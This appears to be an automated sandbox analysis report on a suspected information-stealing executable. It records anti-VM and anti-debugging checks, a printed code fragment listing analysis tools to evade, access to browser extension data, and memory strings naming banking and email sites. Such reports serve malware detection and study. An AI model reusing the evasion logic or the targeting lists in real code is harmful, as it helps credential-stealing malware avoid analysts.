graph_0-16665

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep count: 2212 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212	Thread sleep count: 172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5836	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6850C7E4C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850B88D0 FindFirstFileExW,FindClose,	0_2_00007FF6850B88D0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6850D1EE4
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6850C7E4C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vmwaretray.exe", # VMware
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vboxservice.exe", # VirtualBox
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elif b"vmware" in stdout2.lower():
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 9afaXJv52z.exe, 00000002.00000003.1260081110.0000020DAD984000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1260386665.0000020DAD9A9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1260254537.0000020DAD9B6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551616914.0000020DAD9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD995000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262454309.0000020DAD995000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1260229804.0000020DAD9B1000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551270748.0000020DAD9AA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1260736387.0000020DAD9B6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549904859.0000020DAD92B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vmsrvc.exe", # VirtualBox
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1569004953.0000020DAD886000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1556526685.0000020DAD886000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: net1.exe, 00000048.00000002.1434077572.000001EDB3AE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vmtoolsd.exe", # VMware
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1541670912.0000020DAFEB0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vboxtray.exe", # VirtualBox
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537760232.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1537609364.0000020DB0615000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1539551063.0000020DAE78D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1559016559.0000020DAE7CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SERVICE_NAME: vmicheartbeat
Source: 9afaXJv52z.exe, 00000002.00000003.1552107320.0000020DAD885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SERVICE_NAME: vmicvss
Source: 9afaXJv52z.exe, 00000002.00000003.1540618183.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1554432789.0000020DAF902000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1536704382.0000020DAF5C0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546516598.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: HOSTNAME.EXE, 0000003E.00000002.1385004197.000002372E3A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9afaXJv52z.exe, Exela.exe.2.dr	Binary or memory string: 7QemU
Source: 9afaXJv52z.exe, 00000002.00000003.1546405605.0000020DAF600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SERVICE_NAME: vmicshutdown
